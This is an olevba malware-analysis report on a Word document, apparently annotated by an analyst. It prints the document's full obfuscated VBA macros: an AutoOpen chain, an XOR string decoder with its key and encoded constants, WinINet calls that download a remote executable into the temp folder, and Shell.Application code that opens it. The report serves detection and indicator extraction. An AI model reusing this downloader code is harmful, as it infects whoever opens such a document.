- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASIHB- filename-1.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: filename-1.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: filename-1.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Trampoline: ignores its FELIX argument and simply calls CONRAD
- ' (CONRAD is defined in the AMOS module of this report).
- Sub RAMIRO(FELIX As Long)
- CONRAD
- End Sub
- ' Auto-exec entry point: olevba flags AutoOpen as running when the Word
- ' document is opened. Its only action is to start the call chain through
- ' RAMIRO; the literal 124 is never read by RAMIRO.
- Sub autoopen()
- RAMIRO (124)
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO PERCY.bas
- in file: filename-1.doc - OLE stream: u'Macros/VBA/PERCY'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Orchestrates the download-and-open sequence.
- '   OLIVER - overwritten here with the folder object returned by IGNACIO.
- '   HOMER  - object whose FileExists method WILFRED calls (ELIAS passes the
- '            object created by LAURENCE).
- ' Returns whatever RICARDO returns.
- Public Function ORVILLE(ByRef OLIVER As Object, ByRef HOMER As Object) As Boolean
- Dim DREW As Long
- ' IGNACIO calls GetSpecialFolder(2) on the object built by LAURENCE.
- Set OLIVER = IGNACIO(LAURENCE)
- Dim JODY
- Dim HUGO As String
- ' LIONEL forwards to SHELDON, which XOR-decodes the hex constant RODERICK
- ' with the key IRVING; the 2048 argument has no effect on the result.
- HUGO = LIONEL(2048, IRVING, RODERICK)
- ' Filler loop: DREW is not used afterwards.
- For DREW = 144 To 145
- DREW = DREW * 3
- Next DREW
- ' Target path = folder object & decoded name (presumably via the folder's
- ' default property - confirm).
- JODY = OLIVER & HUGO
- ' The FileExists results are discarded: both If bodies are empty.
- If WILFRED(HOMER, JODY) Then
- End If
- ' RANDOLPH fetches remote content and writes it to JODY; its Boolean
- ' result is also ignored here.
- If RANDOLPH(589, JODY) Then
- End If
- If WILFRED(HOMER, JODY) Then
- End If
- ' RICARDO asks a second COM object to Open the written path.
- ORVILLE = RICARDO(OLIVER, HUGO, 9)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO CLAY.bas
- in file: filename-1.doc - OLE stream: u'Macros/VBA/CLAY'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Returns NICHOLAS.GetSpecialFolder(2). The only caller shown passes the
- ' object created by LAURENCE; for a Scripting.FileSystemObject the value 2
- ' selects the temporary folder (hedged: depends on the decoded ProgID).
- Public Function IGNACIO(ByRef NICHOLAS As Object) As Object
- Set IGNACIO = NICHOLAS.GetSpecialFolder(2)
- End Function
- ' Trampoline: ignores CALEIGH and calls CAMERON with a throwaway string.
- Sub CALEB(CALEIGH As Double)
- CAMERON ("BRUCE")
- End Sub
- ' String de-obfuscator: repeating-key XOR over a hex-encoded string.
- '   ERICK   - key text (callers in this report pass IRVING).
- '   FRANKIE - hex string, two characters per encoded byte.
- ' Returns the decoded text. Analysts can reproduce the decoding offline
- ' from the constants in CORNELIUS.bas without running the macro.
- Public Function SHELDON(ERICK As String, FRANKIE As String) As String
- Dim STEWART As Integer
- Dim DOYLE As Integer
- Dim DARREL As Integer
- ' Filler loop: DARREL only takes values from 77 up, so the End never fires.
- For DARREL = 77 To 78
- If DARREL = 70 Then End
- Next DARREL
- Dim ROGELIO As Long
- Dim TERENCE As String
- ' One iteration per encoded byte: SALVATORE(FRANKIE) is Len(FRANKIE).
- For ROGELIO = 1 _
- To _
- ( _
- SALVATORE _
- (FRANKIE) _
- / 2)
- ' PRESTON yields the ROGELIO-th hex byte, GILBERTO the matching key
- ' character code, RUDOLPH the character for their XOR.
- STEWART = PRESTON(FRANKIE, ROGELIO)
- DOYLE = GILBERTO(ERICK, ROGELIO)
- TERENCE = TERENCE + RUDOLPH(STEWART, DOYLE)
- Next ROGELIO
- SHELDON = TERENCE
- End Function
- ' Trampoline with filler arithmetic: SANTIAGO is unused and the only
- ' meaningful statement is the call to ELIAS (with the value 2).
- Public Function CAMERON(SANTIAGO As String)
- Dim ALONZO As Long
- ALONZO = 1
- ELIAS ALONZO * 2
- ' ALONZO is not read again after this assignment.
- ALONZO = ALONZO + 4
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO ROLANDO.bas
- in file: filename-1.doc - OLE stream: u'Macros/VBA/ROLANDO'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Builds the helper object via LAURENCE and hands off to ORVILLE.
- ' ERNESTO is modified but never used for anything; the three For loops
- ' are filler whose counters are not read afterwards.
- Public Function ELIAS(ERNESTO As Double)
- ' Local object variable; it shares its name with the public function
- ' LIONEL in LAMAR.bas and is passed to ORVILLE unassigned.
- Dim LIONEL As Object
- Dim TAYLOR As Long
- For TAYLOR = 14 To 15
- TAYLOR = TAYLOR + 15
- Next TAYLOR
- Dim ELLIS As Object
- For TAYLOR = 10 To 20
- TAYLOR = TAYLOR + 60
- Next TAYLOR
- ' LAURENCE returns CreateObject(<ProgID decoded from ABRAHAM>).
- Set ELLIS _
- = LAURENCE()
- ERNESTO = ERNESTO + 7
- For TAYLOR = 232 To 233
- TAYLOR = TAYLOR + 28
- Next TAYLOR
- Dim LEWIS As Boolean
- ' ORVILLE performs the download, file write and open; LEWIS is not used.
- LEWIS = ORVILLE(LIONEL, ELLIS)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO CORNELIUS.bas
- in file: filename-1.doc - OLE stream: u'Macros/VBA/CORNELIUS'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Module-level constants. The four hex strings are not plain hex text:
- ' SHELDON XORs each byte with the repeating key IRVING, starting at the
- ' key's second character (see GILBERTO), so a plain hex decode will not
- ' reveal them. Decode offline to extract indicators.
- Option Explicit
- ' Used by RICARDO as a CreateObject ProgID; worked by hand this decodes to
- ' "Shell.Application" - confirm with an offline decode.
- Public Const HORACE = "163A372920620C3F23293A3724263B2A22"
- ' Used by ORVILLE as the name appended to the folder path; decodes to a
- ' backslash-prefixed .exe file name - confirm offline.
- Public Const RODERICK = "19352024223875267D202B31"
- ' Used by WILBERT as the URL argument of InternetOpenUrlA; the first bytes
- ' decode to "http://" - extract the full value offline as a network IOC.
- Public Const CARROLL = "2D2626357663622432233A38243A353723393D61302A3E7B70677D707962283736"
- ' Used by LAURENCE as a CreateObject ProgID; worked by hand this decodes to
- ' "Scripting.FileSystemObject" - confirm with an offline decode.
- Public Const ABRAHAM = "1631202C3C382421346B153D2937013C3F3828221C2739312626"
- ' XOR key for every SHELDON call in this report.
- Public Const IRVING = "TERRELLMOSES"
- ' Size of the fixed-length read buffer in RANDOLPH.
- Private Const ROBIN = 4000
- ' CESAR, JOHCOLIN and MALCOLM are Private to this module but are referenced
- ' from LAMAR.bas (MARCOS) and DEXTER.bas (WILBERT).
- ' NOTE(review): from those modules the names presumably do not resolve to
- ' these values - confirm before treating them as on-the-wire indicators.
- Private Const CESAR As String = "NELSON"
- Private Const JOHCOLIN = 1
- ' &H4000000 matches the WinINet INTERNET_FLAG_DONT_CACHE value.
- Private Const MALCOLM = &H4000000
- ' Returns the single character whose code is STEWART Xor DOYLE; this is
- ' the per-byte step of the SHELDON decoder.
- Public Function RUDOLPH(ByRef STEWART As Integer, ByRef DOYLE As Integer) As String
- RUDOLPH = Chr(STEWART Xor DOYLE)
- End Function
- ' Returns the numeric value of the ROGELIO-th hex byte of FRANKIE:
- ' WOODROW takes two characters starting at PETE(ROGELIO) = 2*ROGELIO - 1
- ' and Val("&H..") parses them as hexadecimal. The 32 is an unused filler
- ' argument.
- Public Function PRESTON(ByRef FRANKIE As String, ByRef ROGELIO As Long) As Integer
- PRESTON = Val("&H" & (WOODROW(32, FRANKIE, PETE(ROGELIO), 2)))
- End Function
- ' Maps a 1-based byte index to the 1-based position of its first hex
- ' character (1 -> 1, 2 -> 3, 3 -> 5, ...).
- Public Function PETE(ByRef ROGELIO As Long) As Long
- PETE = (2 * ROGELIO) - 1
- End Function
- ' Downloader: reads a remote resource through the WinINet declares in
- ' LAMAR.bas and writes the bytes to the file path JONATHON.
- '   GEOFFREY - unused.
- '   JONATHON - destination path (ORVILLE passes folder & decoded name).
- ' Returns True only when the accumulated data has non-zero length; returns
- ' the default False when the session handle is 0.
- ' Defender view: WinINet imports plus a binary file write inside a
- ' document macro are the behaviours olevba flags for this module.
- Public Function RANDOLPH(GEOFFREY As Long, ByVal JONATHON As String) As Boolean
- ' Handle width follows the host: LongPtr on 64-bit VBA7, Long otherwise.
- #If VBA7 _
- And Win64 Then
- Dim GUILLERMO As LongPtr, NOEL As LongPtr
- #Else
- Dim GUILLERMO As Long, NOEL As Long
- #End If
- Dim DREWO As Long
- ' DOMINIC is a fixed-length buffer of ROBIN (4000) characters.
- Dim DOMINIC As String * ROBIN, SPENCER As String
- Dim DELBERT As Integer, COLIN As Double
- ' MARCOS wraps InternetOpenA and returns the session handle.
- GUILLERMO = MARCOS
- If GUILLERMO = 0 Then
- Exit Function
- End If
- Dim LUCAS As Boolean
- ' WILBERT wraps InternetOpenUrlA and stores the URL handle in NOEL; it
- ' always returns True, so the empty If is only a call site.
- If WILBERT(NOEL, GUILLERMO) Then
- End If
- If NOEL = 0 Then
- COLIN = 0
- Else
- ' SYLVESTER is InternetReadFile: fills DOMINIC, byte count in DREWO.
- SYLVESTER NOEL, DOMINIC, ROBIN, DREWO
- ' NOTE(review): the first chunk copies the whole fixed-length buffer, not
- ' just DREWO characters, so a short first read presumably leaves padding
- ' in the written file - confirm against a recovered sample.
- SPENCER = DOMINIC
- Dim RODOLFO As Integer
- ' Filler loop: RODOLFO never exceeds 1232, so the End never fires.
- For RODOLFO = 321 To 322
- If RODOLFO > 1232 Then End
- Next RODOLFO
- ' Keep reading until a read reports zero bytes, appending only the
- ' DREWO characters actually returned.
- Do While DREWO <> 0
- SYLVESTER NOEL, DOMINIC, ROBIN, DREWO
- SPENCER = SPENCER + Mid(DOMINIC, 1, DREWO)
- Loop
- ' COLIN = Len(SPENCER); LOWELL returns FreeFile (its argument is unused).
- COLIN = SALVATORE(SPENCER): _
- DELBERT = LOWELL("JERRY")
- ' Write the accumulated string to JONATHON as a binary file.
- Open JONATHON _
- For Binary Access Write _
- Lock Write _
- As #DELBERT
- Put #DELBERT, _
- , SPENCER
- Dim EDMUND As Double
- ' Filler loop: EDMUND never equals 637.
- For EDMUND = 62 To 63
- If EDMUND = 637 Then End
- Next EDMUND
- Close #DELBERT
- End If
- ' WILSON is InternetCloseHandle, called for the URL and session handles.
- WILSON NOEL
- WILSON GUILLERMO
- SPENCER = ""
- If COLIN Then
- RANDOLPH = True
- End If
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Open | May open a file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Put | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Xor | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Binary | May read or write a binary file (if |
- | | | combined with Open) |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO LAMAR.bas
- in file: filename-1.doc - OLE stream: u'Macros/VBA/LAMAR'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' WinINet imports under obfuscated names, declared twice so the macro runs
- ' on 64-bit VBA7 (PtrSafe / LongPtr) and on older or 32-bit hosts:
- '   WILSON    -> InternetCloseHandle
- '   GUSTAVO   -> InternetOpenA
- '   SYLVESTER -> InternetReadFile
- '   ROOSEVELT -> InternetOpenUrlA
- ' olevba reports "Lib" as suspicious and wininet.dll as an IOC for this
- ' module; direct wininet.dll declares in a Word macro are a useful static
- ' detection signal.
- ' SLIONEL is not referenced anywhere in this report.
- Public Const SLIONEL = "JOHN"
- #If VBA7 And Win64 Then
- ' NOTE(review): the handle parameter is declared ByRef in both branches,
- ' so the API would presumably receive the variable's address instead of
- ' the handle value - confirm whether handles are really closed.
- Public _
- Declare _
- PtrSafe _
- Function _
- WILSON Lib _
- "wininet.dll" Alias "InternetCloseHandle" (ByRef RICHARD As LongPtr) As Long
- Public _
- Declare _
- PtrSafe _
- Function _
- GUSTAVO Lib _
- "wininet.dll" Alias "InternetOpenA" (ByVal SPENCER As String, ByVal JONATHONPH As Long, ByVal THOMAS As String, ByVal PRESTONTOPHER As String, ByVal DANIEL As Long) As LongPtr
- ' DOMINIC is the receive buffer; GEORGE has no ByVal, so it is passed by
- ' reference and receives the number of bytes read.
- Public _
- Declare _
- PtrSafe _
- Function _
- SYLVESTER Lib _
- "wininet.dll" Alias "InternetReadFile" (ByVal PAUL As LongPtr, ByVal DOMINIC As String, ByVal DONALD As Long, GEORGE As Long) As Integer
- Public _
- Declare _
- PtrSafe _
- Function _
- ROOSEVELT Lib _
- "wininet.dll" Alias "InternetOpenUrlA" (ByVal KENNETH As LongPtr, ByVal TERENCEN As String, ByVal EDWARD As String, ByVal BRIAN As Long, ByVal RONALD As Long, ByVal ANTHONY As Long) As LongPtr
- #Else
- ' Same four imports with Long handles for hosts without VBA7/Win64.
- Public Declare Function WILSON Lib "wininet.dll" _
- Alias "InternetCloseHandle" (ByRef RICHARD As Long) As Long
- Public Declare Function GUSTAVO Lib "wininet.dll" _
- Alias "InternetOpenA" (ByVal SPENCER As String, ByVal JONATHONPH As Long, ByVal THOMAS As String, ByVal PRESTONTOPHER As String, ByVal DANIEL As Long) As Long
- Public Declare Function SYLVESTER Lib "wininet.dll" _
- Alias "InternetReadFile" (ByVal PAUL As Long, ByVal DOMINIC As String, ByVal DONALD As Long, GEORGE As Long) As Integer
- Public Declare Function ROOSEVELT Lib "wininet.dll" _
- Alias "InternetOpenUrlA" (ByVal KENNETH As Long, ByVal TERENCEN As String, ByVal EDWARD As String, ByVal BRIAN As Long, ByVal RONALD As Long, ByVal ANTHONY As Long) As Long
- #End If
- ' Thin wrapper over Mid$: returns DOYLE characters of KRISTOPHER starting
- ' at position STEWART. SAMMY is a filler argument; the increment below has
- ' no influence on the returned string.
- Public Function WOODROW(SAMMY As Long, ByRef KRISTOPHER As String, ByRef STEWART As Integer, ByRef DOYLE As Integer) As String
- WOODROW = Mid$(KRISTOPHER, STEWART, DOYLE)
- SAMMY = SAMMY + 50
- End Function
- ' Opens the WinINet session: GUSTAVO is InternetOpenA, called with the
- ' agent string CESAR, access type JOHCOLIN, no proxy strings and flags 0.
- ' Returns the session handle (LongPtr on 64-bit VBA7, Long otherwise).
- ' NOTE(review): CESAR and JOHCOLIN are Private Const in CORNELIUS.bas and
- ' no Option Explicit is shown for this module, so they presumably resolve
- ' to empty values here rather than "NELSON" and 1 - confirm before using
- ' the agent string as a network indicator.
- #If VBA7 _
- And Win64 Then
- Public Function MARCOS() As LongPtr
- #Else
- Public Function MARCOS() As Long
- #End If
- MARCOS = GUSTAVO(CESAR, JOHCOLIN, vbNullString, vbNullString, 0)
- End Function
- ' Indirection layer in front of the decoder: returns
- ' SHELDON(TERRENCE, ENRIQUE), i.e. ENRIQUE XOR-decoded with key TERRENCE.
- ' FREDDIE is a filler argument; doubling it does not affect the result.
- Public Function LIONEL(FREDDIE As Long, TERRENCE As String, ENRIQUE As String) As String
- FREDDIE = FREDDIE * 2
- LIONEL = SHELDON(TERRENCE, ENRIQUE)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | wininet.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO DEXTER.bas
- in file: filename-1.doc - OLE stream: u'Macros/VBA/DEXTER'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Returns JERMAINE.FileExists(FORREST) as an explicit True/False.
- ' ORVILLE calls this before and after the download but discards the
- ' result each time.
- Public Function WILFRED(ByRef JERMAINE As Object, ByVal FORREST As String) As Boolean
- If JERMAINE.FileExists(FORREST) Then
- WILFRED = True
- Else
- WILFRED = False
- End If
- End Function
- ' Returns the character code of the key character used for byte ROGELIO.
- ' The position is (ROGELIO Mod Len(ERICK)) + 1, so byte 1 pairs with the
- ' second key character and the key repeats cyclically. The 44 is a filler
- ' argument for WOODROW.
- Public Function GILBERTO(ByRef ERICK As String, ByRef ROGELIO As Long) As Integer
- GILBERTO = Asc(WOODROW(44, ERICK, _
- ((ROGELIO Mod SALVATORE(ERICK)) + 1), 1))
- End Function
- ' Creates a COM object whose ProgID is hidden from static keyword scans:
- ' the name is the ABRAHAM hex constant XOR-decoded with key IRVING.
- ' Callers use the result for GetSpecialFolder and FileExists; worked by
- ' hand the ProgID is "Scripting.FileSystemObject" - confirm offline.
- Public Function LAURENCE() As Object
- Dim ISMAEL As String
- ISMAEL = SHELDON(IRVING, ABRAHAM)
- Set LAURENCE = CreateObject(ISMAEL)
- End Function
- ' Opens the remote URL on an existing WinINet session.
- '   GRADY - receives the handle returned by ROOSEVELT (InternetOpenUrlA).
- '   NOAH  - session handle from MARCOS.
- ' Always returns True, even when the returned handle is 0; RANDOLPH checks
- ' the handle itself.
- #If VBA7 And Win64 Then
- Public Function WILBERT(ByRef GRADY As LongPtr, NOAH As LongPtr) As Boolean
- #Else
- Public Function WILBERT(ByRef GRADY As Long, NOAH As Long) As Boolean
- #End If
- Dim PHIL As Double
- Dim GUADALUPE As String
- Dim CLARK As Long
- ' URL = CARROLL XOR-decoded with key IRVING (893 is a filler argument).
- ' Decode offline to obtain the network indicator for blocking and hunting.
- GUADALUPE = LIONEL(893, IRVING, CARROLL)
- ' Filler loop: PHIL is not used afterwards.
- For PHIL = 14 To 15
- PHIL = PHIL + 5.5
- Next PHIL
- ' NOTE(review): MALCOLM is a Private Const in CORNELIUS.bas, so in this
- ' module it presumably does not carry the &H4000000 flag value - confirm.
- GRADY = ROOSEVELT(NOAH, GUADALUPE, vbNullString, 0, MALCOLM, 0)
- WILBERT = True
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------+--------------------------+
- | Type | Keyword | Description |
- +------------+--------------+--------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- +------------+--------------+--------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO AMOS.bas
- in file: filename-1.doc - OLE stream: u'Macros/VBA/AMOS'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Second hop of the AutoOpen chain: after a filler loop it calls CALEB.
- ' BERT is declared but never used; ELBERT is not read after the loop.
- Public Sub CONRAD()
- Dim BERT As Long
- Dim ELBERT As Long
- For ELBERT = 5 To 11
- ELBERT = ELBERT * 3
- Next ELBERT
- CALEB (8.2)
- End Sub
- ' Final stage: creates a COM object from the HORACE constant (XOR-decoded
- ' with key IRVING) and calls its Open method on OLIVER & HUGO, the path
- ' RANDOLPH wrote to. Worked by hand the ProgID is "Shell.Application",
- ' which would open the downloaded file - confirm offline.
- ' RUBEN is unused, TOMAS is never declared, and RICARDO is never assigned,
- ' so the function returns the default False.
- ' Defender view: a Word process creating a file and then opening it from
- ' the same macro is the behaviour to alert on.
- Public Function RICARDO(ByRef OLIVER As Object, ByRef HUGO As String, RUBEN As Double) As Boolean
- Set TOMAS = CreateObject _
- (SHELDON _
- (IRVING, HORACE))
- Dim BRETT As Integer
- BRETT = TOMAS.Open(OLIVER & HUGO)
- End Function
- ' Renamed wrapper for Len: returns the length of KRISTOPHER. Wrapping
- ' built-ins this way keeps their names out of the calling code.
- Public Function SALVATORE(KRISTOPHER As String) As Long
- SALVATORE = Len(KRISTOPHER)
- End Function
- ' Renamed wrapper for FreeFile: returns the next available file number.
- ' The KRISTOPHER argument is ignored.
- Public Function LOWELL(KRISTOPHER As String) As Integer
- LOWELL = FreeFile
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------+--------------------------+
- | Type | Keyword | Description |
- +------------+--------------+--------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Open | May open a file |
- +------------+--------------+--------------------------+